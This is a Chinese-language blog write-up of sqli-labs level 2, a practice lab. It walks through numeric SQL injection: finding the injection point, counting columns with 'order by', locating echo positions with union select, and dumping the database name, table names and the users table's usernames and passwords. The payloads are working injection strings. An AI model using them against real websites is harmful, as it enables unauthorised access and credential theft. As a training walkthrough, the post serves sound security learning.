sqli-labs第二关

文章详细描述了通过一系列步骤检测和利用SQL注入漏洞的过程,包括判断注入类型、字段数、回显位,以及爆破数据库名、表名和数据,主要涉及数字型注入和联合查询技术。
摘要由CSDN通过智能技术生成

跟第一关差不多,为了让加深印象,我再写一遍

第一步,判断是否存在注入点,若存在,是什么注入类型?有没有闭合?

?id=1'

页面报错,说明存在注入点;

接下来判断注入类型(当URL末尾加上 --+时,页面不报错即可猜出注入类型)

?id=1 --+

?id=1' --+

?id=1" --+

?id=1') --+

?id=1") --+

多试几个,发现只有?id=1 --+时页面正常,可判断第二关的注入类型为数字型注入,无闭合

第二步,判断字段数

无闭合,所以URL后面的注释符 --+加不加都行,建议加上

?id=1 order by 3 --+

页面正常

?id=1 order by 4 --+

报错,

由此可判断字段数为3

第三步:使用联合查询判断回显位

?id=-1 union select 1,2,3 --+

根据回显的页面,可判断回显位为第2和第3位

第四步:爆破数据库名

?id=-1 union select 1,2,database() --+

 第五步,爆表名

?id=-1 union select 1, 2,(select group_concat(table_name)from information_schema.tables where table_schema='security') --+

由此查询到的表名为:emails,referers,uagents,users

第六步:爆users表中的字段名

得出users表中的字段:id,username,password

第七步:查询表中的字段名 爆数据

?id=-1 union select 1,2,(select group_concat(id,username,password)from users) --+

成功爆出数据

第二关完成啦!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值